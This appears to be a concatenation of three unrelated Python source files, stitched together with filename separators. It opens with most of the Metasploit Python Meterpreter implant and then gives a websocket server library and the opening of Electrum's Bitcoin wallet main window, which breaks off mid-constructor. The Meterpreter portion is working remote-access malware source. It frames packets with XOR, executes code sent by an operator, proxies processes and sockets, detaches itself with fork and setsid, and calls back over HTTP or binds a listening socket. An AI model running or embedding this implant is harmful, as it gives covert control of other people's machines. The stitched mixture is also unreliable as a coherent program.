while received < pkt_length:
received += len(self.socket.recv(pkt_length - received))
self.socket.settimeout(None)
return self._get_packet()
return None
xor_key = packet[:4][::-1]
header = xor_bytes(xor_key, packet[4:12])
pkt_length, pkt_type = struct.unpack('>II', header)
pkt_length -= 8
packet = bytes()
while len(packet) < pkt_length:
packet += self.socket.recv(pkt_length - len(packet))
return xor_bytes(xor_key, packet)
def _send_packet(self, packet):
self.socket.send(packet)
@classmethod
def from_socket(cls, sock):
url = 'tcp://'
address, port = sock.getsockname()[:2]
# this will need to be changed if the bind stager ever supports binding to a specific address
if not address in ('', '0.0.0.0', '::'):
address, port = sock.getpeername()[:2]
url += address + ':' + str(port)
return cls(url, sock)
class PythonMeterpreter(object):
def __init__(self, transport):
self.transport = transport
self.running = False
self.last_registered_extension = None
self.extension_functions = {}
self.channels = {}
self.next_channel_id = 1
self.interact_channels = []
self.processes = {}
self.next_process_id = 1
self.transports = [self.transport]
self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
self.session_expiry_end = time.time() + self.session_expiry_time
for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
self.extension_functions[func[1:]] = getattr(self, func)
self.running = True
def debug_print(self, msg):
if DEBUGGING:
print(msg)
def register_extension(self, extension_name):
self.last_registered_extension = extension_name
return self.last_registered_extension
def register_function(self, func):
self.extension_functions[func.__name__] = func
return func
def register_function_windll(self, func):
if has_windll:
self.register_function(func)
return func
def add_channel(self, channel):
assert (isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket)))
idx = self.next_channel_id
self.channels[idx] = channel
self.debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
self.next_channel_id += 1
return idx
def add_process(self, process):
idx = self.next_process_id
self.processes[idx] = process
self.debug_print('[*] added process id: ' + str(idx))
self.next_process_id += 1
return idx
def get_packet(self):
pkt = self.transport.get_packet()
if pkt is None and self.transport.should_retire:
self.transport_change()
return pkt
def send_packet(self, packet):
send_succeeded = self.transport.send_packet(packet)
if not send_succeeded and self.transport.should_retire:
self.transport_change()
return send_succeeded
@property
def session_has_expired(self):
if self.session_expiry_time == 0:
return False
return time.time() > self.session_expiry_end
def transport_add(self, new_transport):
new_position = self.transports.index(self.transport)
self.transports.insert(new_position, new_transport)
def transport_change(self, new_transport=None):
if new_transport is None:
new_transport = self.transport_next()
self.transport.deactivate()
self.debug_print('[*] changing transport to: ' + new_transport.url)
while not new_transport.activate():
new_transport = self.transport_next(new_transport)
self.debug_print('[*] changing transport to: ' + new_transport.url)
self.transport = new_transport
def transport_next(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) + 1
if new_idx == len(self.transports):
new_idx = 0
return self.transports[new_idx]
def transport_prev(self, current_transport=None):
if current_transport is None:
current_transport = self.transport
new_idx = self.transports.index(current_transport) - 1
if new_idx == -1:
new_idx = len(self.transports) - 1
return self.transports[new_idx]
def run(self):
while self.running and not self.session_has_expired:
request = self.get_packet()
if request:
response = self.create_response(request)
if response:
self.send_packet(response)
continue
# iterate over the keys because self.channels could be modified if one is closed
channel_ids = list(self.channels.keys())
for channel_id in channel_ids:
channel = self.channels[channel_id]
data = bytes()
if isinstance(channel, STDProcess):
if not channel_id in self.interact_channels:
continue
if channel.stderr_reader.is_read_ready():
data = channel.stderr_reader.read()
elif channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read()
elif channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
elif isinstance(channel, MeterpreterSocketClient):
while select.select([channel.fileno()], [], [], 0)[0]:
try:
d = channel.recv(1)
except socket.error:
d = bytes()
if len(d) == 0:
self.handle_dead_resource_channel(channel_id)
break
data += d
elif isinstance(channel, MeterpreterSocketServer):
if select.select([channel.fileno()], [], [], 0)[0]:
(client_sock, client_addr) = channel.accept()
server_addr = channel.getsockname()
client_channel_id = self.add_channel(MeterpreterSocketClient(client_sock))
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'tcp_channel_open')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, client_channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_PARENTID, channel_id)
pkt += tlv_pack(TLV_TYPE_LOCAL_HOST, inet_pton(channel.family, server_addr[0]))
pkt += tlv_pack(TLV_TYPE_LOCAL_PORT, server_addr[1])
pkt += tlv_pack(TLV_TYPE_PEER_HOST, inet_pton(client_sock.family, client_addr[0]))
pkt += tlv_pack(TLV_TYPE_PEER_PORT, client_addr[1])
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
if data:
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_write')
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
pkt += tlv_pack(TLV_TYPE_LENGTH, len(data))
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def handle_dead_resource_channel(self, channel_id):
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
pkt = struct.pack('>I', PACKET_TYPE_REQUEST)
pkt += tlv_pack(TLV_TYPE_METHOD, 'core_channel_close')
pkt += tlv_pack(TLV_TYPE_REQUEST_ID, generate_request_id())
pkt += tlv_pack(TLV_TYPE_CHANNEL_ID, channel_id)
pkt = struct.pack('>I', len(pkt) + 4) + pkt
self.send_packet(pkt)
def _core_uuid(self, request, response):
response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(PAYLOAD_UUID))
return ERROR_SUCCESS, response
def _core_enumextcmd(self, request, response):
extension_name = packet_get_tlv(request, TLV_TYPE_STRING)['value']
for func_name in self.extension_functions.keys():
if func_name.split('_', 1)[0] == extension_name:
response += tlv_pack(TLV_TYPE_STRING, func_name)
return ERROR_SUCCESS, response
def _core_machine_id(self, request, response):
serial = ''
machine_name = platform.uname()[1]
if has_windll:
from ctypes import wintypes
k32 = ctypes.windll.kernel32
sys_dir = ctypes.create_unicode_buffer(260)
if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
return ERROR_FAILURE_WINDOWS
vol_buf = ctypes.create_unicode_buffer(260)
fs_buf = ctypes.create_unicode_buffer(260)
serial_num = wintypes.DWORD(0)
if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
None, fs_buf, ctypes.sizeof(fs_buf)):
return ERROR_FAILURE_WINDOWS
serial_num = serial_num.value
serial = "{0:04x}-{1:04x}".format((serial_num >> 16) & 0xFFFF, serial_num & 0xFFFF)
else:
serial = get_hdd_label()
response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
return ERROR_SUCCESS, response
def _core_patch_url(self, request, response):
if not isinstance(self.transport, HttpTransport):
return ERROR_FAILURE, response
new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if not self.transport.patch_uri_path(new_uri_path):
return ERROR_FAILURE, response
return ERROR_SUCCESS, response
def _core_loadlib(self, request, response):
data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
return ERROR_FAILURE
self.last_registered_extension = None
symbols_for_extensions = {'meterpreter': self}
symbols_for_extensions.update(EXPORTED_SYMBOLS)
i = code.InteractiveInterpreter(symbols_for_extensions)
i.runcode(compile(data_tlv['value'], '', 'exec'))
extension_name = self.last_registered_extension
if extension_name:
check_extension = lambda x: x.startswith(extension_name)
lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
for method in lib_methods:
response += tlv_pack(TLV_TYPE_METHOD, method)
return ERROR_SUCCESS, response
def _core_shutdown(self, request, response):
response += tlv_pack(TLV_TYPE_BOOL, True)
self.running = False
return ERROR_SUCCESS, response
def _core_transport_add(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
return ERROR_SUCCESS, response
def _core_transport_change(self, request, response):
new_transport = Transport.from_request(request)
self.transport_add(new_transport)
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_list(self, request, response):
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())
transport = self.transport_next()
while transport != self.transport:
response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
transport = self.transport_next(transport)
return ERROR_SUCCESS, response
def _core_transport_next(self, request, response):
new_transport = self.transport_next()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_prev(self, request, response):
new_transport = self.transport_prev()
if new_transport == self.transport:
return ERROR_FAILURE, response
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
self.transport_change(new_transport)
return None
def _core_transport_remove(self, request, response):
url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
if self.transport.url == url:
return ERROR_FAILURE, response
transport_found = False
for transport in self.transports:
if transport.url == url:
transport_found = True
break
if transport_found:
self.transports.remove(transport)
return ERROR_SUCCESS, response
return ERROR_FAILURE, response
def _core_transport_set_timeouts(self, request, response):
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
if not timeout_value is None:
self.session_expiry_time = timeout_value
self.session_expiry_end = time.time() + self.session_expiry_time
timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
if timeout_value:
self.transport.communication_timeout = timeout_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
if retry_value:
self.transport.retry_total = retry_value
retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
if retry_value:
self.transport.retry_wait = retry_value
if self.session_expiry_time > 0:
response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
response += self.transport.tlv_pack_timeouts()
return ERROR_SUCCESS, response
def _core_transport_sleep(self, request, response):
seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
self.send_packet(tlv_pack_response(ERROR_SUCCESS, response))
if seconds:
self.transport.deactivate()
time.sleep(seconds)
if not self.transport.activate():
self.transport_change()
return None
def _core_channel_open(self, request, response):
channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
handler = 'channel_open_' + channel_type['value']
if handler not in self.extension_functions:
return error_result(NotImplementedError), response
handler = self.extension_functions[handler]
return handler(request, response)
def _core_channel_close(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
if isinstance(channel, subprocess.Popen):
channel.kill()
elif isinstance(channel, MeterpreterFile):
channel.close()
elif isinstance(channel, MeterpreterSocket):
channel.close()
else:
return ERROR_FAILURE, response
del self.channels[channel_id]
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
self.debug_print('[*] closed and removed channel id: ' + str(channel_id))
return ERROR_SUCCESS, response
def _core_channel_eof(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
result = False
if isinstance(channel, MeterpreterFile):
result = channel.tell() >= os.fstat(channel.fileno()).st_size
response += tlv_pack(TLV_TYPE_BOOL, result)
return ERROR_SUCCESS, response
def _core_channel_interact(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
if toggle:
if channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
else:
self.interact_channels.append(channel_id)
elif channel_id in self.interact_channels:
self.interact_channels.remove(channel_id)
return ERROR_SUCCESS, response
def _core_channel_read(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
data = ''
if isinstance(channel, STDProcess):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
if channel.stdout_reader.is_read_ready():
data = channel.stdout_reader.read(length)
elif isinstance(channel, MeterpreterFile):
data = channel.read(length)
elif isinstance(channel, MeterpreterSocket):
data = channel.recv(length)
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_CHANNEL_DATA, data)
return ERROR_SUCCESS, response
def _core_channel_write(self, request, response):
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
channel_data = packet_get_tlv(request, TLV_TYPE_CHANNEL_DATA)['value']
length = packet_get_tlv(request, TLV_TYPE_LENGTH)['value']
if channel_id not in self.channels:
return ERROR_FAILURE, response
channel = self.channels[channel_id]
l = len(channel_data)
if isinstance(channel, subprocess.Popen):
if channel.poll() != None:
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
channel.write(channel_data)
elif isinstance(channel, MeterpreterFile):
channel.write(channel_data)
elif isinstance(channel, MeterpreterSocket):
try:
l = channel.send(channel_data)
except socket.error:
channel.close()
self.handle_dead_resource_channel(channel_id)
return ERROR_FAILURE, response
else:
return ERROR_FAILURE, response
response += tlv_pack(TLV_TYPE_LENGTH, l)
return ERROR_SUCCESS, response
def create_response(self, request):
resp = struct.pack('>I', PACKET_TYPE_RESPONSE)
method_tlv = packet_get_tlv(request, TLV_TYPE_METHOD)
resp += tlv_pack(method_tlv)
handler_name = method_tlv['value']
if handler_name in self.extension_functions:
handler = self.extension_functions[handler_name]
try:
self.debug_print('[*] running method ' + handler_name)
result = handler(request, resp)
if result is None:
return
result, resp = result
except Exception:
self.debug_print('[-] method ' + handler_name + ' resulted in an error')
if DEBUGGING:
traceback.print_exc(file=sys.stderr)
result = error_result()
else:
if result != ERROR_SUCCESS:
self.debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
else:
self.debug_print('[-] method ' + handler_name + ' was requested but does not exist')
result = error_result(NotImplementedError)
reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
if not reqid_tlv:
return
resp += tlv_pack(reqid_tlv)
return tlv_pack_response(result, resp)
if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0):
if hasattr(os, 'setsid'):
try:
os.setsid()
except OSError:
pass
if HTTP_CONNECTION_URL and has_urllib:
transport = HttpTransport(HTTP_CONNECTION_URL, proxy=HTTP_PROXY, user_agent=HTTP_USER_AGENT)
else:
bind_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
bind_sock.bind(('0.0.0.0', BINDPORT))
bind_sock.listen(1)
s, address = bind_sock.accept()
transport = TcpTransport.from_socket(s)
met = PythonMeterpreter(transport)
# PATCH-SETUP-TRANSPORTS #
met.run()
sys.exit(retCode)
|
websocket_server.py
|
# Author: Johan Hanssen Seferidis
# License: MIT
import sys
import struct
import ssl
from base64 import b64encode
from hashlib import sha1
import logging
from socket import error as SocketError
import errno
import threading
from socketserver import ThreadingMixIn, TCPServer, StreamRequestHandler
from websocket_server.thread import WebsocketServerThread
logger = logging.getLogger(__name__)
logging.basicConfig()
'''
+-+-+-+-+-------+-+-------------+-------------------------------+
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-------+-+-------------+-------------------------------+
|F|R|R|R| opcode|M| Payload len | Extended payload length |
|I|S|S|S| (4) |A| (7) | (16/64) |
|N|V|V|V| |S| | (if payload len==126/127) |
| |1|2|3| |K| | |
+-+-+-+-+-------+-+-------------+ - - - - - - - - - - - - - - - +
| Extended payload length continued, if payload len == 127 |
+ - - - - - - - - - - - - - - - +-------------------------------+
| Payload Data continued ... |
+---------------------------------------------------------------+
'''
FIN = 0x80
OPCODE = 0x0f
MASKED = 0x80
PAYLOAD_LEN = 0x7f
PAYLOAD_LEN_EXT16 = 0x7e
PAYLOAD_LEN_EXT64 = 0x7f
OPCODE_CONTINUATION = 0x0
OPCODE_TEXT = 0x1
OPCODE_BINARY = 0x2
OPCODE_CLOSE_CONN = 0x8
OPCODE_PING = 0x9
OPCODE_PONG = 0xA
CLOSE_STATUS_NORMAL = 1000
DEFAULT_CLOSE_REASON = bytes('', encoding='utf-8')
class API():
def run_forever(self, threaded=False):
return self._run_forever(threaded)
def new_client(self, client, server):
pass
def client_left(self, client, server):
pass
def message_received(self, client, server, message):
pass
def set_fn_new_client(self, fn):
self.new_client = fn
def set_fn_client_left(self, fn):
self.client_left = fn
def set_fn_message_received(self, fn):
self.message_received = fn
def send_message(self, client, msg):
self._unicast(client, msg)
def send_message_to_all(self, msg):
self._multicast(msg)
def shutdown_gracefully(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
self._shutdown_gracefully(status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON)
def shutdown_abruptly(self):
self._shutdown_abruptly()
class WebsocketServer(ThreadingMixIn, TCPServer, API):
"""
A websocket server waiting for clients to connect.
Args:
port(int): Port to bind to
host(str): Hostname or IP to listen for connections. By default 127.0.0.1
is being used. To accept connections from any client, you should use
0.0.0.0.
loglevel: Logging level from logging module to use for logging. By default
warnings and errors are being logged.
Properties:
clients(list): A list of connected clients. A client is a dictionary
like below.
{
'id' : id,
'handler' : handler,
'address' : (addr, port)
}
"""
allow_reuse_address = True
daemon_threads = True # comment to keep threads alive until finished
def __init__(self, port, host='127.0.0.1', loglevel=logging.WARNING, key=None, cert=None):
logger.setLevel(loglevel)
TCPServer.__init__(self, (host, port), WebSocketHandler)
self.port = self.socket.getsockname()[1]
self.key = key
self.cert = cert
self.clients = []
self.id_counter = 0
self.thread = None
def _run_forever(self, threaded):
cls_name = self.__class__.__name__
try:
logger.info("Listening on port %d for clients.." % self.port)
if threaded:
self.daemon = True
self.thread = WebsocketServerThread(target=super().serve_forever, daemon=True, logger=logger)
logger.info(f"Starting {cls_name} on thread {self.thread.getName()}.")
self.thread.start()
else:
self.thread = threading.current_thread()
logger.info(f"Starting {cls_name} on main thread.")
super().serve_forever()
except KeyboardInterrupt:
self.server_close()
logger.info("Server terminated.")
except Exception as e:
logger.error(str(e), exc_info=True)
sys.exit(1)
def _message_received_(self, handler, msg):
self.message_received(self.handler_to_client(handler), self, msg)
def _ping_received_(self, handler, msg):
handler.send_pong(msg)
def _pong_received_(self, handler, msg):
pass
def _new_client_(self, handler):
self.id_counter += 1
client = {
'id': self.id_counter,
'handler': handler,
'address': handler.client_address
}
self.clients.append(client)
self.new_client(client, self)
def _client_left_(self, handler):
client = self.handler_to_client(handler)
self.client_left(client, self)
if client in self.clients:
self.clients.remove(client)
def _unicast(self, receiver_client, msg):
receiver_client['handler'].send_message(msg)
def _multicast(self, msg):
for client in self.clients:
self._unicast(client, msg)
def handler_to_client(self, handler):
for client in self.clients:
if client['handler'] == handler:
return client
def _terminate_client_handlers(self):
"""
Ensures request handler for each client is terminated correctly
"""
for client in self.clients:
client["handler"].keep_alive = False
client["handler"].finish()
client["handler"].connection.close()
def _shutdown_gracefully(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
"""
Send a CLOSE handshake to all connected clients before terminating server
"""
self.keep_alive = False
# Send CLOSE to clients
for client in self.clients:
client["handler"].send_close(CLOSE_STATUS_NORMAL, reason)
self._terminate_client_handlers()
self.server_close()
self.shutdown()
def _shutdown_abruptly(self):
"""
Terminate server without sending a CLOSE handshake
"""
self.keep_alive = False
self._terminate_client_handlers()
self.server_close()
self.shutdown()
class WebSocketHandler(StreamRequestHandler):
def __init__(self, socket, addr, server):
self.server = server
if server.key and server.cert:
try:
socket = ssl.wrap_socket(socket, server_side=True, certfile=server.cert, keyfile=server.key)
except: # Not sure which exception it throws if the key/cert isn't found
logger.warn("SSL not available (are the paths {} and {} correct for the key and cert?)".format(server.key, server.cert))
StreamRequestHandler.__init__(self, socket, addr, server)
def setup(self):
StreamRequestHandler.setup(self)
self.keep_alive = True
self.handshake_done = False
self.valid_client = False
def handle(self):
while self.keep_alive:
if not self.handshake_done:
self.handshake()
elif self.valid_client:
self.read_next_message()
def read_bytes(self, num):
return self.rfile.read(num)
def read_next_message(self):
try:
b1, b2 = self.read_bytes(2)
except SocketError as e: # to be replaced with ConnectionResetError for py3
if e.errno == errno.ECONNRESET:
logger.info("Client closed connection.")
self.keep_alive = 0
return
b1, b2 = 0, 0
except ValueError as e:
b1, b2 = 0, 0
fin = b1 & FIN
opcode = b1 & OPCODE
masked = b2 & MASKED
payload_length = b2 & PAYLOAD_LEN
if opcode == OPCODE_CLOSE_CONN:
logger.info("Client asked to close connection.")
self.keep_alive = 0
return
if not masked:
logger.warn("Client must always be masked.")
self.keep_alive = 0
return
if opcode == OPCODE_CONTINUATION:
logger.warn("Continuation frames are not supported.")
return
elif opcode == OPCODE_BINARY:
logger.warn("Binary frames are not supported.")
return
elif opcode == OPCODE_TEXT:
opcode_handler = self.server._message_received_
elif opcode == OPCODE_PING:
opcode_handler = self.server._ping_received_
elif opcode == OPCODE_PONG:
opcode_handler = self.server._pong_received_
else:
logger.warn("Unknown opcode %#x." % opcode)
self.keep_alive = 0
return
if payload_length == 126:
payload_length = struct.unpack(">H", self.rfile.read(2))[0]
elif payload_length == 127:
payload_length = struct.unpack(">Q", self.rfile.read(8))[0]
masks = self.read_bytes(4)
message_bytes = bytearray()
for message_byte in self.read_bytes(payload_length):
message_byte ^= masks[len(message_bytes) % 4]
message_bytes.append(message_byte)
opcode_handler(self, message_bytes.decode('utf8'))
def send_message(self, message):
self.send_text(message)
def send_pong(self, message):
self.send_text(message, OPCODE_PONG)
def send_close(self, status=CLOSE_STATUS_NORMAL, reason=DEFAULT_CLOSE_REASON):
"""
Send CLOSE to client
Args:
status: Status as defined in https://datatracker.ietf.org/doc/html/rfc6455#section-7.4.1
reason: Text with reason of closing the connection
"""
if status < CLOSE_STATUS_NORMAL or status > 1015:
raise Exception(f"CLOSE status must be between 1000 and 1015, got {status}")
header = bytearray()
payload = struct.pack('!H', status) + reason
payload_length = len(payload)
assert payload_length <= 125, "We only support short closing reasons at the moment"
# Send CLOSE with status & reason
header.append(FIN | OPCODE_CLOSE_CONN)
header.append(payload_length)
self.request.send(header + payload)
def send_text(self, message, opcode=OPCODE_TEXT):
"""
Important: Fragmented(=continuation) messages are not supported since
their usage cases are limited - when we don't know the payload length.
"""
# Validate message
if isinstance(message, bytes):
message = try_decode_UTF8(message) # this is slower but ensures we have UTF-8
if not message:
logger.warning("Can\'t send message, message is not valid UTF-8")
return False
elif not isinstance(message, str):
logger.warning('Can\'t send message, message has to be a string or bytes. Got %s' % type(message))
return False
header = bytearray()
payload = encode_to_UTF8(message)
payload_length = len(payload)
# Normal payload
if payload_length <= 125:
header.append(FIN | opcode)
header.append(payload_length)
# Extended payload
elif payload_length >= 126 and payload_length <= 65535:
header.append(FIN | opcode)
header.append(PAYLOAD_LEN_EXT16)
header.extend(struct.pack(">H", payload_length))
# Huge extended payload
elif payload_length < 18446744073709551616:
header.append(FIN | opcode)
header.append(PAYLOAD_LEN_EXT64)
header.extend(struct.pack(">Q", payload_length))
else:
raise Exception("Message is too big. Consider breaking it into chunks.")
return
self.request.send(header + payload)
def read_http_headers(self):
headers = {}
# first line should be HTTP GET
http_get = self.rfile.readline().decode().strip()
assert http_get.upper().startswith('GET')
# remaining should be headers
while True:
header = self.rfile.readline().decode().strip()
if not header:
break
head, value = header.split(':', 1)
headers[head.lower().strip()] = value.strip()
return headers
def handshake(self):
headers = self.read_http_headers()
try:
assert headers['upgrade'].lower() == 'websocket'
except AssertionError:
self.keep_alive = False
return
try:
key = headers['sec-websocket-key']
except KeyError:
logger.warning("Client tried to connect but was missing a key")
self.keep_alive = False
return
response = self.make_handshake_response(key)
self.handshake_done = self.request.send(response.encode())
self.valid_client = True
self.server._new_client_(self)
@classmethod
def make_handshake_response(cls, key):
return \
'HTTP/1.1 101 Switching Protocols\r\n'\
'Upgrade: websocket\r\n' \
'Connection: Upgrade\r\n' \
'Sec-WebSocket-Accept: %s\r\n' \
'\r\n' % cls.calculate_response_key(key)
@classmethod
def calculate_response_key(cls, key):
GUID = '258EAFA5-E914-47DA-95CA-C5AB0DC85B11'
hash = sha1(key.encode() + GUID.encode())
response_key = b64encode(hash.digest()).strip()
return response_key.decode('ASCII')
def finish(self):
self.server._client_left_(self)
def encode_to_UTF8(data):
try:
return data.encode('UTF-8')
except UnicodeEncodeError as e:
logger.error("Could not encode data to UTF-8 -- %s" % e)
return False
except Exception as e:
raise(e)
return False
def try_decode_UTF8(data):
try:
return data.decode('utf-8')
except UnicodeDecodeError:
return False
except Exception as e:
raise(e)
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, BIP32_RD_Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
def onPress(self, checked=False):
'''Drops the unwanted PyQt4 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == QtCore.Qt.Key_Return:
self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
pr_icons = {
PR_UNPAID:":icons/unpaid.png",
PR_PAID:":icons/confirmed.png",
PR_EXPIRED:":icons/expired.png"
}
pr_tooltips = {
PR_UNPAID:_('Pending'),
PR_PAID:_('Paid'),
PR_EXPIRED:_('Expired')
}
expiration_values = [
(_('1 hour'), 60*60),
(_('1 day'), 24*60*60),
(_('1 week'), 7*24*60*60),
(_('Never'), None)
]
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.invoices = gui_object.invoices
self.contacts = gui_object.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 5)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
tabs.addTab(self.create_history_tab(), _('History') )
tabs.addTab(self.create_send_tab(), _('Send') )
tabs.addTab(self.create_receive_tab(), _('Receive') )
tabs.addTab(self.create_addresses_tab(), _('Addresses') )
tabs.addTab(self.create_contacts_tab(), _('Contacts') )
tabs.addTab(self.create_console_tab(), _('Console') )
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(QIcon(":icons/electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
